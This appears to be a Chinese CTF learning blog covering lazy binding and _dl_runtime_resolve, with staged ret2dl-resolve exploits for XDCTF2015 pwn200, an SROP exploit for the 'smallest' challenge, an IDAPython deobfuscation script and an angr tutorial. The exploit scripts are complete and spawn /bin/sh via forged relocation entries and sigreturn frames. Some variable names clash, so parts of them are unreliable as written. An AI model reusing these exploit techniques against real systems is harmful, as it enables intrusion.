0%

_dl_runtime_resolve

这个应该说是一个很久远的坑了,算是给自己补补基础吧,也是查漏补缺23333,也顺带复习一下延迟绑定

写了一个程序自己调试程序调用_dl_runtime_resolve的过程

1
2
3
4
5
6
7
8
#include<stdio.h>
int main()
{
puts("hello world");
puts("hello world twice");
exit(0);
return 0;
}

第一次调用puts

1579182750270

直接call程序的plt段,plt段是一个是一个类似 jmp [GOT表] 的结构,此时的第一次调用的GOT项<0x804a00c>存放着一个0x08048306的plt段地址,如下所示

1579182851280

这个地方入栈了一个0,然后跳到0x80482f0 再入栈一个[0x804a004] (link_map)然后调用_dl_runtime_resolve函数来调用我们要用的函数

这个resolve函数一共是两个参数,这两个参数分别是一个link_map的指针和puts在ELF JMPREL Relocation Table中的偏移,示意如下

1
_dl_runtime_resolve(link_map, rel_offset)

其中ELF JMPREL Relocation Table中如下所示+0即为puts函数的偏移(64位的话就是index)

1579183036345

第一个参数&link_map如下所示,第三个数是.dynamic段的地址

1579183162193 1579183223982

主要注意观察这三个

这里介绍两个结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
typedef struct//Elf32_Sym 不过这里我没有给Symbol Table的截图
{
Elf32_Word st_name; //dd 符号名,是相对.dynstr起始的偏移
Elf32_Addr st_value;//dd
Elf32_Word st_size; //dd
unsigned char st_info; //db 对于导入函数符号而言,它是0x12
unsigned char st_other;//db
Elf32_Section st_shndx;//dw
} Elf32_Sym; //对于导入函数符号而言,其他字段都是0

typedef struct//Elf32_Rel
{
Elf32_Addr r_offset; //dd 指向GOT表的指针
Elf32_Word r_info; //dd
// 一些关于导入符号的信息,我们只关心从第二个字节开始的值((val)>>8),忽略那个07
} Elf32_Rel;

_dl_runtime_resolve具体步骤

  1. link_map访问.dynamic,取出.dynstr, .dynsym, .rel.plt(存放Elf32_Rel处) 的指针
  2. .rel.plt + 传入的第二个参数求出当前函数的重定位表项Elf32_Rel的指针,记作rel
  3. rel->r_info >> 8作为.dynsym的下标,求出当前函数的符号表项Elf32_Sym的指针,记作sym
  4. .dynstr + sym->st_name得出符号名字符串指针
  5. 在动态链接库查找这个函数的地址,并且把地址赋值给*rel->r_offset,即GOT表
  6. 调用这个函数

大致有这么一张图

image-20200406224128730

第二次调用puts

1579183405159

可以看到此时got表已经被改成了puts函数的地址,所以第二次是直接调用

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
_dl_fixup(struct link_map *l, ElfW(Word) reloc_arg)
{
// 首先通过参数reloc_arg计算重定位入口,这里的JMPREL即.rel.plt,reloc_offset即reloc_arg
const PLTREL *const reloc = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
// 然后通过reloc->r_info找到.dynsym中对应的条目
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
// 这里还会检查reloc->r_info的最低位是不是R_386_JUMP_SLOT=7
assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);
// 接着通过strtab+sym->st_name找到符号表字符串,result为libc基地址
result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope, version, ELF_RTYPE_CLASS_PLT, flags, NULL);
// value为libc基址加上要解析函数的偏移地址,也即实际地址
value = DL_FIXUP_MAKE_VALUE (result, sym ? (LOOKUP_VALUE_ADDRESS (result) + sym->st_value) : 0);
// 最后把value写入相应的GOT表条目中
return elf_machine_fixup_plt (l, result, reloc, rel_addr, value);
}

ret2dl

这个攻击更适于一些比较简单的栈溢出的情况,但同时又难以泄露获取更多信息的情况下

可用方式:

  1. 控制程序执行dl_resolve函数
    • 给定Link_map以及index两个参数。
    • 当然我们可以直接给定 plt[0]对应的汇编代码,这时,我们就只需要一个index就足够了。
  2. 控制index的大小,以便于指向自己所控制的区域,从而伪造一个指定的重定位表项。
  3. 伪造重定位表项,使得重定位表项所指的符号也在自己可以控制的范围内。
  4. 伪造符号内容,使得符号对应的名称也在自己可以控制的范围内

XDCTF2015-pwn200

image-20200406232708454 image-20200406232720644

程序的逻辑很简单,其中最主要的是下面的read栈溢出

为了来一步步学习ret2dl,就照着师傅的博客一步步来

stage1

stage是通过一个栈迁移的运用来打印我们读入的字符串/bin/sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = 'pwn200' #binary's name here
context.binary = binary #context here
context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']

pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\x00'))
my_u32 = lambda x: u32(x.ljust(4, '\x00'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

# todo here
ppp_ret = 0x0804856c
pop_ebp_ret = 0x08048453
leave_ret = 0x08048481

stack_size = 0x800
bss_addr = 0x0804A020 # readelf -S bof | grep ".bss"
base_stage = bss_addr + stack_size

read_plt=0x08048390
write_plt=0x080483C0
'''
0x08048453 : pop ebp ; ret
0x08048452 : pop ebx ; pop ebp ; ret
0x0804856c : pop ebx ; pop edi ; pop ebp ; ret
0x080485cc : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804836c : pop ebx ; ret
0x0804856d : pop edi ; pop ebp ; ret
0x080485cd : pop esi ; pop edi ; pop ebp ; ret
0x0804834b : ret
0x08048532 : ret 0xb8
0x08048481 : leave ; ret
'''
p.recvuntil('Welcome to XDCTF2015~!\n')
payload = 'A' * 0x70
payload += p32(read_plt) # 读100个字节到base_stage 这里栈是先读再迁移
payload += p32(ppp_ret) #清除参数
payload += p32(0)
payload += p32(base_stage)
payload += p32(100)
payload += p32(pop_ebp_ret) # 把base_stage pop到ebp中
payload += p32(base_stage)
payload += p32(leave_ret) # mov esp, ebp ; pop ebp ;将esp指向base_stage
raw_input()
p.sendline(payload)

cmd = "/bin/sh"

payload2 = 'AAAA' # 接上一个payload的leave->pop ebp ; ret
payload2 += p32(write_plt)
payload2 += 'AAAA'
payload2 += p32(1)
payload2 += p32(base_stage + 80)
payload2 += p32(len(cmd))
payload2 += 'A' * (80 - len(payload2)) # pad
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
p.sendline(payload2)
p.interactive()

p.interactive()

stage2

这里修改了payload2,使其成为利用plt[0]+fake_index的方法来打印/bin/sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cmd = "/bin/sh"

plt_0 = 0x08048370
index_offset = 0x20 # write's index

payload2 = 'AAAA' # for pop ebp
payload2 += p32(plt_0)
payload2 += p32(index_offset) #fake index
payload2 += 'AAAA'
payload2 += p32(1)
payload2 += p32(base_stage + 80)
payload2 += p32(len(cmd))
payload2 += 'A' * (80 - len(payload2))
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
p.sendline(payload2)

stage3

这次是利用一个fake Elf32_Rel,和fake offset来实现write的调用 offset就是通过fake_reloc-rel_plt的偏移计算出来的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
cmd = "/bin/sh"
plt_0 = 0x08048370
rel_plt = 0x08048318
index_offset = (base_stage + 28) - rel_plt # base_stage + 28指向fake_reloc,减去rel_plt即偏移
write_got = elf.got['write']
r_info = 0x507 # write: Elf32_Rel->r_info
fake_reloc = p32(write_got) + p32(r_info)

payload2 = 'AAAA'
payload2 += p32(plt_0)
payload2 += p32(index_offset)
payload2 += 'AAAA'
payload2 += p32(1)
payload2 += p32(base_stage + 80)
payload2 += p32(len(cmd))
payload2 += fake_reloc # (base_stage+28)的位置
payload2 += 'A' * (80 - len(payload2))
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
p.sendline(payload2)
p.interactive()

stage4

此时伪造了一个Elf32_Sym结构体还有fake r_info,至此我们已经可以劫持构造Elf32_Rel还有Elf32_sym了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
...
cmd = "/bin/sh"
plt_0 = 0x08048370
rel_plt = 0x08048318
index_offset = (base_stage + 28) - rel_plt
write_got = elf.got['write']
dynsym = 0x080481D8
dynstr = 0x08048268
fake_sym_addr = base_stage + 36
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf) # 这里的对齐操作是因为dynsym里的Elf32_Sym结构体都是0x10字节大小
fake_sym_addr = fake_sym_addr + align
index_dynsym = (fake_sym_addr - dynsym) / 0x10 # 除以0x10因为Elf32_Sym结构体的大小为0x10,得到write的dynsym索引号
r_info = (index_dynsym << 8) | 0x7
fake_reloc = p32(write_got) + p32(r_info)
st_name = 0x54
fake_sym = p32(st_name) + p32(0) + p32(0) + p32(0x12)

payload2 = 'AAAA'
payload2 += p32(plt_0)
payload2 += p32(index_offset)
payload2 += 'AAAA'
payload2 += p32(1)
payload2 += p32(base_stage + 80)
payload2 += p32(len(cmd))
payload2 += fake_reloc # (base_stage+28)的位置
payload2 += 'B' * align #算出要对齐的字节数
payload2 += fake_sym # (base_stage+36)的位置
payload2 += 'A' * (80 - len(payload2))
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
p.sendline(payload2)
p.interactive()

stage5

前面我们写了st_name = 0x54,指向的是string table中的write字符串

然后我们把他修改成我们输入的write字符串

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
cmd = "/bin/sh"
plt_0 = 0x08048370
rel_plt = 0x08048318
index_offset = (base_stage + 28) - rel_plt
write_got = elf.got['write']
dynsym = 0x080481D8
dynstr = 0x08048268
fake_sym_addr = base_stage + 36
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf)
fake_sym_addr = fake_sym_addr + align
index_dynsym = (fake_sym_addr - dynsym) / 0x10
r_info = (index_dynsym << 8) | 0x7
fake_reloc = p32(write_got) + p32(r_info)
st_name = (fake_sym_addr + 0x10) - dynstr # 加0x10因为Elf32_Sym的大小为0x10
fake_sym = p32(st_name) + p32(0) + p32(0) + p32(0x12)

payload2 = 'AAAA'
payload2 += p32(plt_0)
payload2 += p32(index_offset)
payload2 += 'AAAA'
payload2 += p32(1)
payload2 += p32(base_stage + 80)
payload2 += p32(len(cmd))
payload2 += fake_reloc # (base_stage+28)的位置
payload2 += 'B' * align
payload2 += fake_sym # (base_stage+36)的位置
payload2 += "write\x00"
payload2 += 'A' * (80 - len(payload2))
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
r.sendline(payload2)
r.interactive()

stage6

上一步我们用输入的write实现了调用,这一步直接改成system不就是getshell了吗

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
cmd = "/bin/sh"
plt_0 = 0x08048380
rel_plt = 0x08048330
index_offset = (base_stage + 28) - rel_plt
write_got = elf.got['write']
dynsym = 0x080481d8
dynstr = 0x08048278
fake_sym_addr = base_stage + 36
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf)
fake_sym_addr = fake_sym_addr + align
index_dynsym = (fake_sym_addr - dynsym) / 0x10
r_info = (index_dynsym << 8) | 0x7
fake_reloc = p32(write_got) + p32(r_info)
st_name = (fake_sym_addr + 0x10) - dynstr
fake_sym = p32(st_name) + p32(0) + p32(0) + p32(0x12)

payload2 = 'AAAA'
payload2 += p32(plt_0)
payload2 += p32(index_offset)
payload2 += 'AAAA'
payload2 += p32(base_stage + 80)
payload2 += 'aaaa'
payload2 += 'aaaa'
payload2 += fake_reloc # (base_stage+28)的位置
payload2 += 'B' * align
payload2 += fake_sym # (base_stage+36)的位置
payload2 += "system\x00"
payload2 += 'A' * (80 - len(payload2))
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
p.sendline(payload2)
p.interactive()

模板

这里使用到了roputils

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from roputils import *
from pwn import process
from pwn import gdb
from pwn import context
r = process('./pwn200')
context.log_level = 'debug'

rop = ROP('./pwn200')
offset = 112
bss_base = rop.section('.bss')
buf = rop.fill(offset)

buf += rop.call('read', 0, bss_base, 100) #返回地址处自动加上了有ppp_ret的地址
## used to call dl_Resolve()
buf += rop.dl_resolve_call(bss_base + 20, bss_base) # dl_resolve_call第一个参数是Elf32_Rel的base,用来填上fake Rel结构体偏移的 第二个是*args,执行dl_resolve_call时函数的参数
r.send(buf)

buf = rop.string('/bin/sh') # /bin/sh是system参数
buf += rop.fill(20, buf)
## used to make faking data, such relocation, Symbol, Str
buf += rop.dl_resolve_data(bss_base + 20, 'system') # 这里同时填上了Elf32_Rel结构体和Elf32_sym结构体(base+20对应前面的base+20,注意)
buf += rop.fill(100, buf)
r.send(buf)
r.interactive()

不过在布置base的时候需要注意一下bss的内容还有一些对齐操作,必要时调试观察+修改一下base


参考链接:

https://bbs.pediy.com/thread-227034.htm

https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/

64位参考链接:https://xz.aliyun.com/t/5722#toc-2

高级栈溢出——SROP

查漏补缺233333

SROP

Sigreturn Oriented Programming

其中Unix-like system处理信号量的机制主要步骤分为如下:

当内核向某个进程发起(deliver)一个signal,该进程会被暂时挂起(suspend),进入内核(1)
然后内核为该进程保存相应的上下文,跳转到之前注册好的signal handler中处理相应signal(2)
当signal handler返回之后(3)
内核为该进程恢复之前保存的上下文,最后恢复进程的执行(4)

ucontext

伪造时需要注意:esp,ebp和es,gs等段寄存器不可直接设置为0

保存上下文时保存的内容叫ucontext,具体对应如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
struct sigcontext	//x86
{
unsigned short gs, __gsh;
unsigned short fs, __fsh;
unsigned short es, __esh;
unsigned short ds, __dsh;
unsigned long edi;
unsigned long esi;
unsigned long ebp;
unsigned long esp;
unsigned long ebx;
unsigned long edx;
unsigned long ecx;
unsigned long eax;
unsigned long trapno;
unsigned long err;
unsigned long eip;
unsigned short cs, __csh;
unsigned long eflags;
unsigned long esp_at_signal;
unsigned short ss, __ssh;
struct _fpstate * fpstate;
unsigned long oldmask;
unsigned long cr2;
};

////////////////////////////////////////////////
struct _fpstate //x64
{
/* FPU environment matching the 64-bit FXSAVE layout. */
__uint16_t cwd;
__uint16_t swd;
__uint16_t ftw;
__uint16_t fop;
__uint64_t rip;
__uint64_t rdp;
__uint32_t mxcsr;
__uint32_t mxcr_mask;
struct _fpxreg _st[8];
struct _xmmreg _xmm[16];
__uint32_t padding[24];
};

struct sigcontext
{
__uint64_t r8;
__uint64_t r9;
__uint64_t r10;
__uint64_t r11;
__uint64_t r12;
__uint64_t r13;
__uint64_t r14;
__uint64_t r15;
__uint64_t rdi;
__uint64_t rsi;
__uint64_t rbp;
__uint64_t rbx;
__uint64_t rdx;
__uint64_t rax;
__uint64_t rcx;
__uint64_t rsp;
__uint64_t rip;
__uint64_t eflags;
unsigned short cs;
unsigned short gs;
unsigned short fs;
unsigned short __pad0;
__uint64_t err;
__uint64_t trapno;
__uint64_t oldmask;
__uint64_t cr2;
__extension__ union
{
struct _fpstate * fpstate;
__uint64_t __fpstate_word;
};
__uint64_t __reserved1 [8];
};

syscall

具体利用时需要的是调用sigreturn系统调用

1
2
3
4
5
6
/*for x86*/
mov eax,0x77
int 80h
/*for x86_64*/
mov rax,0xf
syscall

利用原理:

  • Signal Frame 被保存在用户的地址空间中,所以用户是可以读写的。
  • 由于内核与信号处理程序无关 (kernel agnostic about signal handlers),它并不会去记录这个 signal 对应的 Signal Frame,所以当执行 sigreturn 系统调用时,此时的 Signal Frame 并不一定是之前内核为用户进程保存的 Signal Frame。

比如当我们执行sigreturn系统调用之前栈布局是如下情况的话,当系统执行完 sigreturn 系统调用之后,会执行一系列的 pop 指令以便于恢复相应寄存器的值,当执行到 rip 时,就会将程序执行流指向 syscall 地址,根据相应寄存器的值,此时,便会得到一个 shell

image-20200406192003998

链式利用原理:

  • 控制栈指针。
  • 把原来 rip 指向的syscall gadget 换成syscall; ret gadget。

如下图所示 ,这样当每次 syscall 返回的时候,栈指针都会指向下一个 Signal Frame。因此就可以执行一系列的 sigreturn 函数调用

image-20200406192224800

利用条件

  1. 程序存在栈溢出漏洞
  2. 知道栈地址或者可以知道需要使用字符串的地址等
  3. 知道sigreturn的地址
  4. 知道syscall的地址或者syscall gadget地址

smallest

原理看上去挺好理解,还是直接实操吧

image-20200406194252445

程序没有canary和PIE保护

具体的程序就这么几行汇编代码:

1
2
3
4
5
6
xor     rax, rax
mov edx, 400h ; count
mov rsi, rsp ; buf
mov rdi, rax ; fd
syscall ; LINUX - sys_read
retn

然后加载进程序的时候只有这么几个寄存器被操作了,其余值均为0(Ubuntu16.04)

直接从rsp处读取了0x400个字节的栈内容,其中最主要还是需要知道怎么来构造出sigreturn的syscall操作

这里通过一个exp来学习一下:

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = 'smallest' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\x00'))
my_u32 = lambda x: u32(x.ljust(4, '\x00'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

# todo here
syscall_ret = 0x00000000004000BE
start_addr = 0x00000000004000B0
## set start addr three times
payload = p64(start_addr) * 3
p.send(payload)

## modify the return addr to start_addr+3
## so that skip the xor rax,rax; After read rax=1
## get stack addr
sh.send('\xb3') # 这一步很巧妙,只读了一个字节绕过 xor rax,rax 刚好把rax设置成1用于write leak栈地址
stack_addr = u64(sh.recv()[8:16])
log.success('leak stack addr :' + hex(stack_addr))

## make the rsp point to stack_addr
## the frame is read(0,stack_addr,0x400)
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_read # constans直接获取SYS_read的系统调用号,这里为什么要通过sigframe链式利用stack_addr可能是因为这样比较好设置/bin/sh的偏移,直接通过leak到的地址来设置
sigframe.rdi = 0
sigframe.rsi = stack_addr
sigframe.rdx = 0x400
sigframe.rsp = stack_addr
sigframe.rip = syscall_ret
payload = p64(start_addr) + 'a' * 8 + str(sigframe) #先设置好sigframe,然后跳到start再读取一次
sh.send(payload)

# set rax=15 and call sigreturn
sigreturn = p64(syscall_ret) + 'b' * 7 #这里相当于把前一步的aaaaaaaa(返回地址处)填充成p64(syscall_ret),然后把rax设置成0x15,直接调用syscall,就会用到我们的sigframe,这7个b似乎没有影响
#调用完之后会直接按照sigframe执行 read(0,stack_addr,0x400)
sh.send(sigreturn) # 这个时候就会直接往leak的stack_addr处读取0x400个字节,sigframe的长度是0x98

# call execv("/bin/sh",0,0)
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = stack_addr + 0x120 # "/bin/sh" 's addr
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = stack_addr
sigframe.rip = syscall_ret

frame_payload = p64(start_addr) + 'b' * 8 + str(sigframe)
print len(frame_payload)
payload = frame_payload + (0x120 - len(frame_payload)) * '\x00' + '/bin/sh\x00'
sh.send(payload)
sh.send(sigreturn)
sh.interactive()


p.interactive()

参考链接:

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced-rop-zh/#srop

http://www.reshahar.com/2017/05/04/360%E6%98%A5%E7%A7%8B%E6%9D%AFsmallest-pwn%E7%9A%84%E5%AD%A6%E4%B9%A0%E4%B8%8E%E5%88%A9%E7%94%A8/

https://www.anquanke.com/post/id/85810

https://www.freebuf.com/articles/network/87447.html

自己学校新生杯一道逆向题引导的angr学习

前言

上学期在图书馆研究室偶然提到了自己协会办比赛可以给学弟学妹们拿学分的想法,我当时的想法是办可以办,就是题目可能得非常简单他们才能写,嘛不过事实确实是这样。可是有外校师傅一起加入之后就变的很活跃了,室友请了启奡师傅还有福州大学的师傅来出题,自己也在二进制方向放了一波签到题,举行了一次面向大一大二的新生杯,也拉了一些外校的师傅来打,整体办的还是蛮成功的,室友看上去也挺开心,这里专门用启奡师傅给的逆向来记一篇一直没有接触的angr的学习

题目

看来以后写博客得把题目链接也给上了,所以去github新建了一个用来放题目的仓库,题目链接

拿到题目之后首先用IDA脚本去花指令,这里用的是IDApython

1
2
3
4
5
6
7
8
9
10
11
ads = 0x4005B0

end = 0x401DC0

codes = get_bytes(ads, end-ads)

codes = codes.replace("\x74\x03\x75\x01\xe8\x90", "\x90\x90\x90\x90\x90\x90")

patch_bytes(ads, codes)

print "[+] patch ok"

得到函数之后可以发现是一个很长的线性执行流程,直接手动把整个流程一步步过肯定很麻烦了,当然要自己写脚本来简化

1585656430766

出题人wp写的思路是:

  1. 简单花指令的去除
  2. 在有限域上运算的简化

ps:在逆向的时候突然发现原来IDA可以按=映射变量,噗,我尼玛玩了这么久的IDA居然才知道

第一种解法:IDApython

其中一种解题方法是用IDApython来解,这里也学习了一些IDApython脚本的用法,具体脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def trans(xx, kk):
return [(x-kk) & 0xFF for x in xx]
def xor(xx, kk):
return [x^kk for x in xx]
def not_(xx):
return [~x for x in xx]

dt = [0xd9, 0x2c, 0x27, 0xd6, 0xd8, 0x2a, 0xda, 0x2d, 0xd7, 0x2c, 0xdc, 0xe1, 0xdb, 0x2c, 0xd9, 0xdd, 0x27, 0x2d, 0x2a, 0xdc, 0xdb, 0x2c, 0xe1, 0x29, 0xda, 0xda, 0x2c, 0xda, 0x2a, 0xd9, 0x29, 0x2a]

ads = 0x4005B0
end = 0x401DC0
i = PrevHead(end)
while i > ads: #获取不同的指令以及指令的操作数来进行求解
if GetMnem(i) == 'xor' and GetOpnd(i, 0) == 'byte ptr [rdx+rax+5]':
k = int(GetOpnd(i, 1).rstrip('h'), 16)
dt = xor(dt, k)
print("xor: {}".format(k))
if GetMnem(i) == 'add' and GetOpnd(i, 0) == 'byte ptr [rdx+rax+5]':
k = int(GetOpnd(i, 1).rstrip('h'), 16)
dt = trans(dt, k)
print("trans: {}".format(k))
if GetMnem(i) == 'not' and GetOpnd(i, 0) == 'byte ptr [rdx+rax+5]':
dt = not_(dt)
print("not: {}".format(k))
i = PrevHead(i)

print(dt)

第二种解法:angr

当然我这这篇文章主要要说的就是第二种解法了:angr求解

What is angr

首先angr是一个什么东西呢

angr is a suite of Python 3 libraries that let you load a binary and do a lot of cool things to it:

(angr是一个套用来加载二进制文件做一些很酷的事情的python3库)

具体可以用来做以下的一些事(虽然不知道大佬们把这些翻译成什么中文了,大致看看先)

  • Disassembly and intermediate-representation lifting
  • Program instrumentation
  • Symbolic execution
  • Control-flow analysis
  • Data-dependency analysis
  • Value-set analysis (VSA)
  • Decompilation

在使用之前强烈建议多了解一下符号执行的概念,要不然官方文档中很多英文还有概念可能会看不懂,特别是那些带数学符号的概念名词,不过细心一点看不会很难懂的。但是毕竟有些词语有些学术化,我也懒得用那么多俗语来解释了,下文只在一些重要地方做一些注释

例如:这篇文章

安装

安装环境:Ubuntu16.04

  1. 安装之前首先把自己默认的python3.5换成了python 3.7.1(编译安装)
  2. sudo apt-get install python3-dev libffi-dev build-essential virtualenvwrapper
  3. mkvirtualenv --python=$(which python3) angr && pip install angr

其中virtualenvwrapper是一个Python虚拟环境,使用虚拟环境的主要原因是angr会修改libz3和libVEX

创建虚拟环境之后每次使用workondeactivate即可在真实与虚拟环境切换

使用&examples

这里用一个简单的例子来开始直接上手学习angr吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
char *sneaky = "SOSNEAKY";

int authenticate(char *username, char *password)
{
char stored_pw[9];
stored_pw[8] = 0;
int pwfile;

// evil back d00r
if (strcmp(password, sneaky) == 0) return 1;

pwfile = open(username, O_RDONLY);
read(pwfile, stored_pw, 8);

if (strcmp(password, stored_pw) == 0) return 1;
return 0;

}

int accepted()
{
printf("Welcome to the admin console, trusted user!\n");
}

int rejected()
{
printf("Go away!");
exit(1);
}

int main(int argc, char **argv)
{
char username[9];
char password[9];
int authed;

username[8] = 0;
password[8] = 0;

printf("Username: \n");
read(0, username, 8);
read(0, &authed, 1);
printf("Password: \n");
read(0, password, 8);
read(0, &authed, 1);

authed = authenticate(username, password);
if (authed) accepted();
else rejected();
}

这里程序给出了一个很简单的逻辑,具体是我们只要输入password"SOSNEAKY"就可以直接认证通过

然后这里是angr官网给出的solve.py,我在其中注释处做了一些补充笔记

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#!/usr/bin/env python

import angr
import sys

# Look at fauxware.c! This is the source code for a "faux firmware" (@zardus
# really likes the puns) that's meant to be a simple representation of a
# firmware that can authenticate users but also has a backdoor - the backdoor
# is that anybody who provides the string "SOSNEAKY" as their password will be
# automatically authenticated.

def basic_symbolic_execution():
# We can use this as a basic demonstration of using angr for symbolic
# execution. First, we load the binary into an angr project.
# 这里先展示了一个很基础的符号执行,首先把对应的binary文件名填进一个angr Project
p = angr.Project('eg1',load_options={"auto_load_libs": False})
# 这里我加上了 "load_options={"auto_load_libs": False}"
# 在load了Project之后可以用p.loader.all_objects查看所有加载器已加载的对象

# Now, we want to construct a representation of symbolic program state.
# SimState objects are what angr manipulates when it symbolically executes
# binary code.
# SimState对象也主要保存着程序运行到某一阶段的状态信息。通过这个对象可以操作某一运行状态的上下文信息
# 比如内存,寄存器等

# 可以通过Project.factory这个容器中的任何一个方法来获取SimState对象,这个factory有多个构造函数
# 如:block、entry_state等。这里使用entry_state返回一个初始化到二进制entry point的SimState对象
# The entry_state constructor generates a SimState that is a very generic
# representation of the possible program states at the program's entry
# point. entry_state 主要是做一些初始化工作,然后在程序的入口处停下
# There are more constructors, like blank_state, which constructs a
# "blank slate" state that specifies as little concrete data as possible,
# or full_init_state, which performs a slow and pedantic initialization of
# program state as it would execute through the dynamic loader.
# 其中 full_init_state 会从动态链接时开始就记录

state = p.factory.entry_state()
# state对象一般是作为 符号执行开始前创建用来为后续的执行初始化一些数据,比如栈状态,寄存器值。
# 或者在 路径探索结束后 返回一个 state 对象供用户提取需要的值或进行约束求解
# 解出到达目标分支所使用的符号量的值。

# 当然了解了符号执行的概念之后就知道为什么有时候要默认在程序入口点停下了,毕竟我们暂时要分析的是程序的执行流

# Now, in order to manage the symbolic execution process from a very high
# level, we have a SimulationManager. SimulationManager is just collections
# of states with various tags attached with a number of convenient
# interfaces for managing them.

sm = p.factory.simulation_manager(state)
# 根据state设置 Simulation Managers ,这是一个进行路径探索的对象
# Uncomment the following line to spawn an IPython shell when the program
# gets to this point so you can poke around at the four objects we just
# constructed. Use tab-autocomplete and IPython's nifty feature where if
# you stick a question mark after the name of a function or method and hit
# enter, you are shown the documentation string for it.

# import IPython; IPython.embed()

# Now, we begin execution. This will symbolically execute the program until
# we reach a branch statement for which both branches are satisfiable.

sm.run(until=lambda sm_: len(sm_.active) > 1)
# 此示例代码采用的方法是用Simulation Managers的run方法
# 执行刚好出现 2个分支时就执行完毕,也就是我们后门函数的那个if条件被触发,此时程序产生两个执行分支,随即停止

# If you look at the C code, you see that the first "if" statement that the
# program can come across is comparing the result of the strcmp with the
# backdoor password. So, we have halted execution with two states, each of
# which has taken a different arm of that conditional branch. If you drop
# an IPython shell here and examine sm.active[n].solver.constraints
# you will see the encoding of the condition that was added to the state to
# constrain it to going down this path, instead of the other one. These are
# the constraints that will eventually be passed to our constraint solver
# (z3) to produce a set of concrete inputs satisfying them.

# As a matter of fact, we'll do that now.

input_0 = sm.active[0].posix.dumps(0)
input_1 = sm.active[1].posix.dumps(0)

# We have used a utility function on the state's posix plugin to perform a
# quick and dirty concretization of the content in file descriptor zero,
# stdin. One of these strings should contain the substring "SOSNEAKY"!

# 当然这里也可以选择把所有分支都打印出来看看,代码:
# for i in range(len(pathgroup.active)):
# print "possible %d: " % i, pathgroup.active[i].state.posix.dumps(0)
# 此时dump的就是字符串str
if b'SOSNEAKY' in input_0:
return input_0
else:
return input_1

def test():
r = basic_symbolic_execution()
assert b'SOSNEAKY' in r

if __name__ == '__main__':
